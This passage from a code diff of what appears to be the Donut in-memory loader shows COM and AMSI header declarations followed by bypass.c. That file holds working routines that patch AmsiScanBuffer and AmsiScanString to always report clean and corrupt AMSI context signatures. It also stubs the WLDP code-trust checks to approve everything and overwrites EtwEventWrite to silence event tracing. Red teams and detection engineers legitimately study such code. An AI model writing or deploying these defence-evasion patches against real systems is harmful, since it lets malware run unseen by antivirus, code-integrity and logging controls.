250 /* [in] */ DWORD dwFlags,
251 /* [out] */ BSTR *pbstrName,
252 /* [out] */ EXCEPINFO *pexcepinfo);
253
254 HRESULT ( STDMETHODCALLTYPE *ParseScriptText )(
255 IActiveScriptParse64 *This,
256 /* [in] */ LPCOLESTR pstrCode,
257 /* [in] */ LPCOLESTR pstrItemName,
258 /* [in] */ IUnknown *punkContext,
259 /* [in] */ LPCOLESTR pstrDelimiter,
260 /* [in] */ DWORDLONG dwSourceContextCookie,
261 /* [in] */ ULONG ulStartingLineNumber,
262 /* [in] */ DWORD dwFlags,
263 /* [out] */ VARIANT *pvarResult,
264 /* [out] */ EXCEPINFO *pexcepinfo);
265
266 END_INTERFACE
267 } IActiveScriptParse64Vtbl;
268
269 typedef struct _IActiveScriptParse64 {
270 IActiveScriptParse64Vtbl *lpVtbl;
271 } ActiveScriptParse64;
272
273 typedef struct _IActiveScriptSiteWindowVtbl {
274 BEGIN_INTERFACE
275
276 HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
277 IActiveScriptSiteWindow * This,
278 /* [in] */ REFIID riid,
279 /* [annotation][iid_is][out] */
280 void **ppvObject);
281
282 ULONG ( STDMETHODCALLTYPE *AddRef )(
283 IActiveScriptSiteWindow * This);
284
285 ULONG ( STDMETHODCALLTYPE *Release )(
286 IActiveScriptSiteWindow * This);
287
288 HRESULT ( STDMETHODCALLTYPE *GetWindow )(
289 IActiveScriptSiteWindow * This,
290 /* [out] */ HWND *phwnd);
291
292 HRESULT ( STDMETHODCALLTYPE *EnableModeless )(
293 IActiveScriptSiteWindow * This,
294 /* [in] */ BOOL fEnable);
295
296 END_INTERFACE
297 } IActiveScriptSiteWindowVtbl;
298
299 typedef struct _IActiveScriptSiteWindow {
300 IActiveScriptSiteWindowVtbl *lpVtbl;
301 ULONG m_cRef;
302 PDONUT_INSTANCE inst;
303 } ActiveScriptSiteWindow;
304
305 typedef struct _IActiveScriptErrorVtbl {
306 BEGIN_INTERFACE
307
308 HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
309 IActiveScriptError * This,
310 /* [in] */ REFIID riid,
311 /* [annotation][iid_is][out] */
312 void **ppvObject);
313
314 ULONG ( STDMETHODCALLTYPE *AddRef )(
315 IActiveScriptError * This);
316
317 ULONG ( STDMETHODCALLTYPE *Release )(
318 IActiveScriptError * This);
319
320 /* [local] */ HRESULT ( STDMETHODCALLTYPE *GetExceptionInfo )(
321 IActiveScriptError * This,
322 /* [out] */ EXCEPINFO *pexcepinfo);
323
324 HRESULT ( STDMETHODCALLTYPE *GetSourcePosition )(
325 IActiveScriptError * This,
326 /* [out] */ DWORD *pdwSourceContext,
327 /* [out] */ ULONG *pulLineNumber,
328 /* [out] */ LONG *plCharacterPosition);
329
330 HRESULT ( STDMETHODCALLTYPE *GetSourceLineText )(
331 IActiveScriptError * This,
332 /* [out] */ BSTR *pbstrSourceLine);
333
334 END_INTERFACE
335 } IActiveScriptErrorVtbl;
336
337 typedef struct _IActiveScriptError {
338 IActiveScriptErrorVtbl *lpVtbl;
339 } ActiveScriptError;
340
341 typedef struct _IActiveScriptSiteVtbl {
342 BEGIN_INTERFACE
343
344 HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
345 IActiveScriptSite * This,
346 /* [in] */ REFIID riid,
347 /* [annotation][iid_is][out] */
348 void **ppvObject);
349
350 ULONG ( STDMETHODCALLTYPE *AddRef )(
351 IActiveScriptSite * This);
352
353 ULONG ( STDMETHODCALLTYPE *Release )(
354 IActiveScriptSite * This);
355
356 HRESULT ( STDMETHODCALLTYPE *GetLCID )(
357 IActiveScriptSite * This,
358 /* [out] */ LCID *plcid);
359
360 HRESULT ( STDMETHODCALLTYPE *GetItemInfo )(
361 IActiveScriptSite * This,
362 /* [in] */ LPCOLESTR pstrName,
363 /* [in] */ DWORD dwReturnMask,
364 /* [out] */ IUnknown **ppiunkItem,
365 /* [out] */ ITypeInfo **ppti);
366
367 HRESULT ( STDMETHODCALLTYPE *GetDocVersionString )(
368 IActiveScriptSite * This,
369 /* [out] */ BSTR *pbstrVersion);
370
371 HRESULT ( STDMETHODCALLTYPE *OnScriptTerminate )(
372 IActiveScriptSite * This,
373 /* [in] */ const VARIANT *pvarResult,
374 /* [in] */ const EXCEPINFO *pexcepinfo);
375
376 HRESULT ( STDMETHODCALLTYPE *OnStateChange )(
377 IActiveScriptSite * This,
378 /* [in] */ SCRIPTSTATE ssScriptState);
379
380 HRESULT ( STDMETHODCALLTYPE *OnScriptError )(
381 IActiveScriptSite * This,
382 /* [in] */ IActiveScriptError *pscripterror);
383
384 HRESULT ( STDMETHODCALLTYPE *OnEnterScript )(
385 IActiveScriptSite * This);
386
387 HRESULT ( STDMETHODCALLTYPE *OnLeaveScript )(
388 IActiveScriptSite * This);
389
390 END_INTERFACE
391 } IActiveScriptSiteVtbl;
392
393 typedef struct _IActiveScriptSite {
394 IActiveScriptSiteVtbl *lpVtbl;
395 ULONG m_cRef;
396 } ActiveScriptSite;
397
398 #ifdef _WIN64
399 #define IActiveScriptParse IActiveScriptParse64
400 #define IID_IActiveScriptParse IID_IActiveScriptParse64
401 #else
402 #define IActiveScriptParse IActiveScriptParse32
403 #define IID_IActiveScriptParse IID_IActiveScriptParse32
404 #endif
405
406 static VOID ActiveScript_New(PDONUT_INSTANCE inst, IActiveScriptSite *this);
407
408 static STDMETHODIMP ActiveScript_QueryInterface(IActiveScriptSite *this, REFIID riid, void **ppv);
409 static STDMETHODIMP_(ULONG) ActiveScript_AddRef(IActiveScriptSite *this);
410 static STDMETHODIMP_(ULONG) ActiveScript_Release(IActiveScriptSite *this);
411
412 // Informs the host that the scripting engine has begun executing the script code.
413 static STDMETHODIMP ActiveScript_OnEnterScript(IActiveScriptSite *this);
414
415 // Informs the host that the scripting engine has returned from executing script code.
416 static STDMETHODIMP ActiveScript_OnLeaveScript(IActiveScriptSite *this);
417
418 // Retrieves the locale identifier that the host uses for displaying user-interface elements.
419 static STDMETHODIMP ActiveScript_GetLCID(IActiveScriptSite *this, LCID *lcid);
420
421 // Retrieves a host-defined string that uniquely identifies the current document version from the host's point of view.
422 static STDMETHODIMP ActiveScript_GetDocVersionString(IActiveScriptSite *this, BSTR *version);
423
424 // Informs the host that an execution error occurred while the engine was running the script.
425 static STDMETHODIMP ActiveScript_OnScriptError(IActiveScriptSite *this, IActiveScriptError *scriptError);
426
427 // Informs the host that the scripting engine has changed states.
428 static STDMETHODIMP ActiveScript_OnStateChange(IActiveScriptSite *this, SCRIPTSTATE state);
429
430 // Obtains information about an item that was added to an engine through a call to the IActiveScript::AddNamedItem method.
431 static STDMETHODIMP ActiveScript_GetItemInfo(IActiveScriptSite *this, LPCOLESTR objectName, DWORD dwReturnMask, IUnknown **objPtr, ITypeInfo **typeInfo);
432
433 // Called when the script has completed execution.
434 static STDMETHODIMP ActiveScript_OnScriptTerminate(IActiveScriptSite *this, const VARIANT *pvr, const EXCEPINFO *pei);
435
436 // ################################################# IActiveScriptSiteWindow ###############################################
437 static VOID ActiveScriptSiteWindow_New(PDONUT_INSTANCE inst, IActiveScriptSiteWindow *this);
438
439 // IUnknown
440 static STDMETHODIMP ActiveScriptSiteWindow_QueryInterface(IActiveScriptSiteWindow *this, REFIID riid, void **ppv);
441 static STDMETHODIMP_(ULONG) ActiveScriptSiteWindow_AddRef(IActiveScriptSiteWindow *this);
442 static STDMETHODIMP_(ULONG) ActiveScriptSiteWindow_Release(IActiveScriptSiteWindow *this);
443
444 // IActiveScriptSiteWindow
445 static STDMETHODIMP ActiveScriptSiteWindow_GetWindow(IActiveScriptSiteWindow *iface, HWND *phwnd);
446 static STDMETHODIMP ActiveScriptSiteWindow_EnableModeless(IActiveScriptSiteWindow *iface, BOOL fEnable);
447
448 #endif
449
+182
-0
loader/amsi.h less more
0 /**
1 BSD 3-Clause License
2
3 Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
4
5 Redistribution and use in source and binary forms, with or without
6 modification, are permitted provided that the following conditions are met:
7
8 * Redistributions of source code must retain the above copyright notice, this
9 list of conditions and the following disclaimer.
10
11 * Redistributions in binary form must reproduce the above copyright notice,
12 this list of conditions and the following disclaimer in the documentation
13 and/or other materials provided with the distribution.
14
15 * Neither the name of the copyright holder nor the names of its
16 contributors may be used to endorse or promote products derived from
17 this software without specific prior written permission.
18
19 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
20 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
21 IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
22 DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
23 FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
24 DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
25 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
26 CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
27 OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
28 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
29 */
30
31 #ifndef AMSI_H
32 #define AMSI_H
33
34 #include <windows.h>
35
36 DECLARE_HANDLE(HAMSICONTEXT);
37 DECLARE_HANDLE(HAMSISESSION);
38
39 typedef struct _IAmsiStream IAmsiStream;
40 typedef struct _IAntimalware IAntimalware;
41 typedef struct _IAntimalwareProvider IAntimalwareProvider;
42
43 typedef enum tagAMSI_RESULT {
44 // No detection found. Result likely not going to change after future definition update.
45 // a.k.a. known good
46 AMSI_RESULT_CLEAN = 0,
47 // No detection found. Result might change after future definition update.
48 AMSI_RESULT_NOT_DETECTED = 1,
49 // Detection found. It is recommended to abort executing the content if it is executable, e.g. a script.
50 // Return result of 1 - 32767 is estimated risk level that an antimalware provider might indicate.
51 // The large the result, the riskier to continue.
52 // Any return result equal to or larger than 32768 is consider malware and should be blocked.
53 // These values are provider specific, and may indicate malware family or ID.
54 // An application should use AmsiResultIsMalware() to determine whether the content should be blocked.
55 AMSI_RESULT_DETECTED = 32768,
56 } AMSI_RESULT;
57
58 typedef enum tagAMSI_ATTRIBUTE {
59 // Name/version/GUID string of the calling application.
60 AMSI_ATTRIBUTE_APP_NAME = 0,
61 // LPWSTR, filename, URL, script unique id etc.
62 AMSI_ATTRIBUTE_CONTENT_NAME = 1,
63 // ULONGLONG, size of the input. Mandatory.
64 AMSI_ATTRIBUTE_CONTENT_SIZE = 2,
65 // PVOID, memory address if content is fully loaded in memory. Mandatory unless
66 // Read() is implemented instead to support on-demand content retrieval.
67 AMSI_ATTRIBUTE_CONTENT_ADDRESS = 3,
68 // PVOID, session is used to associate different scan calls, e.g. if the contents
69 // to be scanned belong to the sample original script. Return nullptr if content
70 // is self-contained. Mandatory.
71 AMSI_ATTRIBUTE_SESSION = 4,
72 } AMSI_ATTRIBUTE;
73
74 typedef struct IAmsiStreamVtbl {
75 BEGIN_INTERFACE
76
77 HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
78 IAmsiStream * This,
79 REFIID riid,
80 void **ppvObject);
81
82 ULONG ( STDMETHODCALLTYPE *AddRef )(
83 IAmsiStream * This);
84
85 ULONG ( STDMETHODCALLTYPE *Release )(
86 IAmsiStream * This);
87
88 HRESULT ( STDMETHODCALLTYPE *GetAttribute )(
89 IAmsiStream * This,
90 AMSI_ATTRIBUTE attribute,
91 ULONG dataSize,
92 unsigned char *data,
93 ULONG *retData);
94
95 HRESULT ( STDMETHODCALLTYPE *Read )(
96 IAmsiStream * This,
97 ULONGLONG position,
98 ULONG size,
99 unsigned char *buffer,
100 ULONG *readSize);
101
102 END_INTERFACE
103 } IAmsiStreamVtbl;
104
105 typedef struct _IAmsiStream {
106 IAmsiStreamVtbl *lpVtbl;
107 } AmsiStream;
108
109 typedef struct IAntimalwareProviderVtbl {
110 BEGIN_INTERFACE
111
112 HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
113 IAntimalwareProvider * This,
114 REFIID riid,
115 void **ppvObject);
116
117 ULONG ( STDMETHODCALLTYPE *AddRef )(
118 IAntimalwareProvider * This);
119
120 ULONG ( STDMETHODCALLTYPE *Release )(
121 IAntimalwareProvider * This);
122
123 HRESULT ( STDMETHODCALLTYPE *Scan )(
124 IAntimalwareProvider * This,
125 IAmsiStream *stream,
126 AMSI_RESULT *result);
127
128 void ( STDMETHODCALLTYPE *CloseSession )(
129 IAntimalwareProvider * This,
130 ULONGLONG session);
131
132 HRESULT ( STDMETHODCALLTYPE *DisplayName )(
133 IAntimalwareProvider * This,
134 LPWSTR *displayName);
135
136 END_INTERFACE
137 } IAntimalwareProviderVtbl;
138
139 typedef struct _IAntimalwareProvider {
140 IAntimalwareProviderVtbl *lpVtbl;
141 } AntimalwareProvider;
142
143 typedef struct IAntimalwareVtbl {
144 BEGIN_INTERFACE
145
146 HRESULT ( STDMETHODCALLTYPE *QueryInterface)(
147 IAntimalware *This,
148 REFIID riid,
149 void **ppvObject);
150
151 ULONG ( STDMETHODCALLTYPE *AddRef )(
152 IAntimalware * This);
153
154 ULONG ( STDMETHODCALLTYPE *Release )(
155 IAntimalware * This);
156
157 HRESULT ( STDMETHODCALLTYPE *Scan )(
158 IAntimalware * This,
159 IAmsiStream *stream,
160 AMSI_RESULT *result,
161 IAntimalwareProvider **provider);
162
163 void ( STDMETHODCALLTYPE *CloseSession )(
164 IAntimalware * This,
165 ULONGLONG session);
166
167 END_INTERFACE
168 } IAntimalwareVtbl;
169
170 typedef struct _IAntimalware {
171 IAntimalwareVtbl *lpVtbl;
172 } Antimalware;
173
174 typedef struct tagHAMSICONTEXT {
175 DWORD Signature; // "AMSI" or 0x49534D41
176 PWCHAR AppName; // set by AmsiInitialize
177 IAntimalware *Antimalware; // set by AmsiInitialize
178 DWORD SessionCount; // increased by AmsiOpenSession
179 } _HAMSICONTEXT, *_PHAMSICONTEXT;
180
181 #endif
+448
-0
loader/bypass.c less more
0 /**
1 BSD 3-Clause License
2
3 Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
4
5 Redistribution and use in source and binary forms, with or without
6 modification, are permitted provided that the following conditions are met:
7
8 * Redistributions of source code must retain the above copyright notice, this
9 list of conditions and the following disclaimer.
10
11 * Redistributions in binary form must reproduce the above copyright notice,
12 this list of conditions and the following disclaimer in the documentation
13 and/or other materials provided with the distribution.
14
15 * Neither the name of the copyright holder nor the names of its
16 contributors may be used to endorse or promote products derived from
17 this software without specific prior written permission.
18
19 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
20 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
21 IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
22 DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
23 FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
24 DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
25 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
26 CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
27 OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
28 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
29 */
30
31 #include "bypass.h"
32
33 #if defined(BYPASS_AMSI_A)
34 // This is where you may define your own AMSI bypass.
35 // To rebuild with your bypass, modify the makefile to add an option to build with BYPASS_AMSI_A defined.
36 BOOL DisableAMSI(PDONUT_INSTANCE inst) {
37 return TRUE;
38 }
39
40 #elif defined(BYPASS_AMSI_B)
41 // fake function that always returns S_OK and AMSI_RESULT_CLEAN
42 HRESULT WINAPI AmsiScanBufferStub(
43 HAMSICONTEXT amsiContext,
44 PVOID buffer,
45 ULONG length,
46 LPCWSTR contentName,
47 HAMSISESSION amsiSession,
48 AMSI_RESULT *result)
49 {
50 *result = AMSI_RESULT_CLEAN;
51 return S_OK;
52 }
53
54 // This function is never called. It's simply used to calculate
55 // the length of AmsiScanBufferStub above.
56 //
57 // The reason it performs a multiplication is because MSVC can identify
58 // functions that perform the same operation and eliminate them
59 // from the compiled code. Null subroutines are eliminated, so the body of
60 // function needs to do something.
61
62 int AmsiScanBufferStubEnd(int a, int b) {
63 return a * b;
64 }
65
66 // fake function that always returns S_OK and AMSI_RESULT_CLEAN
67 HRESULT WINAPI AmsiScanStringStub(
68 HAMSICONTEXT amsiContext,
69 LPCWSTR string,
70 LPCWSTR contentName,
71 HAMSISESSION amsiSession,
72 AMSI_RESULT *result)
73 {
74 *result = AMSI_RESULT_CLEAN;
75 return S_OK;
76 }
77
78 int AmsiScanStringStubEnd(int a, int b) {
79 return a + b;
80 }
81
82 BOOL DisableAMSI(PDONUT_INSTANCE inst) {
83 HMODULE dll;
84 DWORD len, op, t;
85 LPVOID cs;
86 SIZE_T rs;
87 PVOID ba;
88 NTSTATUS status;
89 PSYSCALL_LIST syscall_list;
90
91 syscall_list = (PSYSCALL_LIST)(ULONG_PTR)inst->syscall_list;
92
93 // try load amsi. if unable, assume DLL doesn't exist
94 // and return TRUE to indicate it's okay to continue
95 dll = xGetLibAddress(inst, inst->amsi);
96 if(dll == NULL) return TRUE;
97
98 // resolve address of AmsiScanBuffer. if not found,
99 // return FALSE because it should exist ...
100 cs = xGetProcAddress(inst, dll, inst->amsiScanBuf, 0);
101 if(cs == NULL) return FALSE;
102
103 // calculate length of stub
104 len = (ULONG_PTR)AmsiScanBufferStubEnd -
105 (ULONG_PTR)AmsiScanBufferStub;
106
107 DPRINT("Length of AmsiScanBufferStub is %" PRIi32 " bytes.", len);
108
109 // check for negative length. this would only happen when
110 // compiler decides to re-order functions.
111 if((int)len < 0) return FALSE;
112
113 // make the memory writeable. return FALSE on error
114 ba = cs;
115 rs = len;
116 status = NtProtectVirtualMemory(NtCurrentProcess(), &ba, &rs, PAGE_EXECUTE_READWRITE, &op, syscall_list);
117 if(!NT_SUCCESS(status)) return FALSE;
118
119 DPRINT("Overwriting AmsiScanBuffer");
120 // over write with virtual address of stub
121 Memcpy(cs, ADR(PCHAR, AmsiScanBufferStub), len);
122 // set memory back to original protection
123 NtProtectVirtualMemory(NtCurrentProcess(), &ba, &rs, op, &t, syscall_list);
124
125 // resolve address of AmsiScanString. if not found,
126 // return FALSE because it should exist ...
127 cs = xGetProcAddress(inst, dll, inst->amsiScanStr, 0);
128 if(cs == NULL) return FALSE;
129
130 // calculate length of stub
131 len = (ULONG_PTR)AmsiScanStringStubEnd -
132 (ULONG_PTR)AmsiScanStringStub;
133
134 DPRINT("Length of AmsiScanStringStub is %" PRIi32 " bytes.", len);
135
136 // check for negative length. this would only happen when
137 // compiler decides to re-order functions.
138 if((int)len < 0) return FALSE;
139
140 // make the memory writeable
141 ba = cs;
142 rs = len;
143 status = NtProtectVirtualMemory(NtCurrentProcess(), &ba, &rs, PAGE_EXECUTE_READWRITE, &op, syscall_list);
144 if(!NT_SUCCESS(status)) return FALSE;
145
146 DPRINT("Overwriting AmsiScanString");
147 // over write with virtual address of stub
148 Memcpy(cs, ADR(PCHAR, AmsiScanStringStub), len);
149 // set memory back to original protection
150 NtProtectVirtualMemory(NtCurrentProcess(), &ba, &rs, op, &t, syscall_list);
151
152 return TRUE;
153 }
154
155 #elif defined(BYPASS_AMSI_C)
156 BOOL DisableAMSI(PDONUT_INSTANCE inst) {
157 HMODULE dll;
158 PBYTE cs;
159 DWORD i, op, t;
160 BOOL disabled = FALSE;
161 PDWORD Signature;
162 SIZE_T rs;
163 PVOID ba;
164 NTSTATUS status;
165 PSYSCALL_LIST syscall_list;
166
167 syscall_list = (PSYSCALL_LIST)(ULONG_PTR)inst->syscall_list;
168
169 // try load amsi. if unable to load, assume
170 // it doesn't exist and return TRUE to indicate
171 // it's okay to continue.
172 dll = xGetLibAddress(inst, inst->amsi);
173 if(dll == NULL) return TRUE;
174
175 // resolve address of AmsiScanBuffer. if unable, return
176 // FALSE because it should exist.
177 cs = (PBYTE)xGetProcAddress(inst, dll, inst->amsiScanBuf, 0);
178 if(cs == NULL) return FALSE;
179
180 // scan for signature
181 for(i=0;;i++) {
182 Signature = (PDWORD)&cs[i];
183 // is it "AMSI"?
184 if(*Signature == *(PDWORD)inst->amsi) {
185 // set memory protection for write access
186 ba = cs;
187 rs = sizeof(DWORD);
188 status = NtProtectVirtualMemory(NtCurrentProcess(), &ba, &rs, PAGE_EXECUTE_READWRITE, &op, syscall_list);
189 if(!NT_SUCCESS(status)) return FALSE;
190
191 // change signature
192 *Signature++;
193
194 // set memory back to original protection
195 NtProtectVirtualMemory(NtCurrentProcess(), &ba, &rs, op, &t, syscall_list);
196 disabled = TRUE;
197 break;
198 }
199 }
200 return disabled;
201 }
202
203 #elif defined(BYPASS_AMSI_D)
204 // Attempt to find AMSI context in .data section of CLR.dll
205 // Could also scan PEB.ProcessHeap for this..
206 // Disabling AMSI via AMSI context is based on idea by Matt Graeber
207 // https://gist.github.com/mattifestation/ef0132ba4ae3cc136914da32a88106b9
208
209 BOOL DisableAMSI(PDONUT_INSTANCE inst) {
210 LPVOID clr;
211 BOOL disabled = FALSE;
212 PIMAGE_DOS_HEADER dos;
213 PIMAGE_NT_HEADERS nt;
214 PIMAGE_SECTION_HEADER sh;
215 DWORD i, j, res;
216 PBYTE ds;
217 MEMORY_BASIC_INFORMATION mbi;
218 _PHAMSICONTEXT ctx;
219 PSYSCALL_LIST syscall_list;
220
221 syscall_list = (PSYSCALL_LIST)(ULONG_PTR)inst->syscall_list;
222
223 // get address of CLR.dll. if unable, this
224 // probably isn't a dotnet assembly being loaded
225 clr = inst->api.GetModuleHandleA(inst->clr);
226 if(clr == NULL) return FALSE;
227
228 dos = (PIMAGE_DOS_HEADER)clr;
229 nt = RVA2VA(PIMAGE_NT_HEADERS, clr, dos->e_lfanew);
230 sh = (PIMAGE_SECTION_HEADER)((LPBYTE)&nt->OptionalHeader +
231 nt->FileHeader.SizeOfOptionalHeader);
232
233 // scan all writeable segments while disabled == FALSE
234 for(i = 0;
235 i < nt->FileHeader.NumberOfSections && !disabled;
236 i++)
237 {
238 // if this section is writeable, assume it's data
239 if (sh[i].Characteristics & IMAGE_SCN_MEM_WRITE) {
240 // scan section for pointers to the heap
241 ds = RVA2VA (PBYTE, clr, sh[i].VirtualAddress);
242
243 for(j = 0;
244 j < sh[i].Misc.VirtualSize - sizeof(ULONG_PTR);
245 j += sizeof(ULONG_PTR))
246 {
247 // get pointer
248 ULONG_PTR ptr = *(ULONG_PTR*)&ds[j];
249 // query if the pointer
250 status = NtQueryVirtualMemory(NtCurrentProcess(), (LPVOID)ptr, MemoryBasicInformation, &mbi, sizeof(mbi), NULL, syscall_list);
251 if (!NT_SUCCESS(status)) return FALSE;
252
253 // if it's a pointer to heap or stack
254 if ((mbi.State == MEM_COMMIT ) &&
255 (mbi.Type == MEM_PRIVATE ) &&
256 (mbi.Protect == PAGE_READWRITE))
257 {
258 ctx = (_PHAMSICONTEXT)ptr;
259 // check if it contains the signature
260 if(ctx->Signature == *(PDWORD*)inst->amsi) {
261 // corrupt it
262 ctx->Signature++;
263 disabled = TRUE;
264 break;
265 }
266 }
267 }
268 }
269 }
270 return disabled;
271 }
272 #endif
273
274 #if defined(BYPASS_WLDP_A)
275 // This is where you may define your own WLDP bypass.
276 // To rebuild with your bypass, modify the makefile to add an option to build with BYPASS_WLDP_A defined.
277
278 BOOL DisableWLDP(PDONUT_INSTANCE inst) {
279 return TRUE;
280 }
281
282 #elif defined(BYPASS_WLDP_B)
283
284 // fake function that always returns S_OK and isApproved = TRUE
285 HRESULT WINAPI WldpIsClassInApprovedListStub(
286 REFCLSID classID,
287 PWLDP_HOST_INFORMATION hostInformation,
288 PBOOL isApproved,
289 DWORD optionalFlags)
290 {
291 *isApproved = TRUE;
292 return S_OK;
293 }
294
295 // make sure prototype and code are different from other subroutines
296 // to avoid removal by MSVC
297 int WldpIsClassInApprovedListStubEnd(int a, int b) {
298 return a - b;
299 }
300
301 // fake function that always returns S_OK
302 HRESULT WINAPI WldpQueryDynamicCodeTrustStub(
303 HANDLE fileHandle,
304 PVOID baseImage,
305 ULONG ImageSize)
306 {
307 return S_OK;
308 }
309
310 int WldpQueryDynamicCodeTrustStubEnd(int a, int b) {
311 return a / b;
312 }
313
314 BOOL DisableWLDP(PDONUT_INSTANCE inst) {
315 HMODULE wldp;
316 DWORD len, op, t;
317 LPVOID cs;
318 SIZE_T rs;
319 PVOID ba;
320 NTSTATUS status;
321 PSYSCALL_LIST syscall_list;
322
323 syscall_list = (PSYSCALL_LIST)(ULONG_PTR)inst->syscall_list;
324
325 // try load wldp. if unable, assume DLL doesn't exist
326 // and return TRUE to indicate it's okay to continue
327 wldp = xGetLibAddress(inst, inst->wldp);
328 if(wldp == NULL) return TRUE;
329
330 // resolve address of WldpQueryDynamicCodeTrust
331 // if not found, return FALSE because it should exist
332 cs = xGetProcAddress(inst, wldp, inst->wldpQuery, 0);
333 if(cs == NULL) return FALSE;
334
335 // calculate length of stub
336 len = (ULONG_PTR)WldpQueryDynamicCodeTrustStubEnd -
337 (ULONG_PTR)WldpQueryDynamicCodeTrustStub;
338
339 DPRINT("Length of WldpQueryDynamicCodeTrustStub is %" PRIi32 " bytes.", len);
340
341 // check for negative length. this would only happen when
342 // compiler decides to re-order functions.
343 if((int)len < 0) return FALSE;
344
345 // make the memory writeable. return FALSE on error
346 ba = cs;
347 rs = len;
348 status = NtProtectVirtualMemory(NtCurrentProcess(), &ba, &rs, PAGE_EXECUTE_READWRITE, &op, syscall_list);
349 if(!NT_SUCCESS(status)) return FALSE;
350
351 // overwrite with virtual address of stub
352 Memcpy(cs, ADR(PCHAR, WldpQueryDynamicCodeTrustStub), len);
353 // set back to original protection
354 NtProtectVirtualMemory(NtCurrentProcess(), &ba, &rs, op, &t, syscall_list);
355
356 // resolve address of WldpIsClassInApprovedList
357 // if not found, return FALSE because it should exist
358 cs = xGetProcAddress(inst, wldp, inst->wldpIsApproved, 0);
359 if(cs == NULL) return FALSE;
360
361 // calculate length of stub
362 len = (ULONG_PTR)WldpIsClassInApprovedListStubEnd -
363 (ULONG_PTR)WldpIsClassInApprovedListStub;
364
365 DPRINT("Length of WldpIsClassInApprovedListStub is %" PRIi32 " bytes.", len);
366
367 // check for negative length. this would only happen when
368 // compiler decides to re-order functions.
369 if((int)len < 0) return FALSE;
370
371 // make the memory writeable. return FALSE on error
372 ba = cs;
373 rs = len;
374 status = NtProtectVirtualMemory(NtCurrentProcess(), &ba, &rs, PAGE_EXECUTE_READWRITE, &op, syscall_list);
375 if(!NT_SUCCESS(status)) return FALSE;
376
377 // overwrite with virtual address of stub
378 Memcpy(cs, ADR(PCHAR, WldpIsClassInApprovedListStub), len);
379 // set back to original protection
380 NtProtectVirtualMemory(NtCurrentProcess(), &ba, &rs, op, &t, syscall_list);
381
382 return TRUE;
383 }
384 #endif
385
386 #if defined(BYPASS_ETW_A)
387 // This is where you may define your own ETW bypass.
388 // To rebuild with your bypass, modify the makefile to add an option to build with BYPASS_ETW_A defined.
389 BOOL DisableETW(PDONUT_INSTANCE inst) {
390 return TRUE;
391 }
392
393 #elif defined(BYPASS_ETW_B)
394 BOOL DisableETW(PDONUT_INSTANCE inst) {
395 HMODULE dll;
396 DWORD len, op, t;
397 LPVOID cs;
398 SIZE_T rs;
399 PVOID ba;
400 NTSTATUS status;
401 PSYSCALL_LIST syscall_list;
402
403 syscall_list = (PSYSCALL_LIST)(ULONG_PTR)inst->syscall_list;
404
405 // get a handle to ntdll.dll
406 dll = xGetLibAddress(inst, inst->ntdll);
407
408 // resolve address of EtwEventWrite
409 // if not found, return FALSE because it should exist
410 cs = xGetProcAddress(inst, dll, inst->etwEventWrite, 0);
411 if (cs == NULL) return FALSE;
412
413 #ifdef _WIN64
414 // make the memory writeable. return FALSE on error
415 ba = cs;
416 rs = 1;
417 status = NtProtectVirtualMemory(NtCurrentProcess(), &ba, &rs, PAGE_EXECUTE_READWRITE, &op, syscall_list);
418 if(!NT_SUCCESS(status)) return FALSE;
419
420 DPRINT("Overwriting EtwEventWrite");
421
422 // over write with "ret"
423 Memcpy(cs, inst->etwRet64, 1);
424
425 // set memory back to original protection
426 NtProtectVirtualMemory(NtCurrentProcess(), &ba, &rs, op, &t, syscall_list);
427 #else
428 // make the memory writeable. return FALSE on error
429 ba = cs;
430 rs = 4;
431 status = NtProtectVirtualMemory(NtCurrentProcess(), &ba, &rs, PAGE_EXECUTE_READWRITE, &op, syscall_list);
432 if(!NT_SUCCESS(status)) return FALSE;
433
434 DPRINT("Overwriting EtwEventWrite");
435
436 // over write with "ret 14h"
437 Memcpy(cs, inst->etwRet32, 4);
438
439 // set memory back to original protection
440 NtProtectVirtualMemory(NtCurrentProcess(), &ba, &rs, op, &t, syscall_list);
441 #endif
442
443 return TRUE;
444
445 }
446
447 #endif
+313
-0
loader/bypass.h less more
0 /**
1 BSD 3-Clause License
2
3 Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
4
5 Redistribution and use in source and binary forms, with or without
6 modification, are permitted provided that the following conditions are met:
7
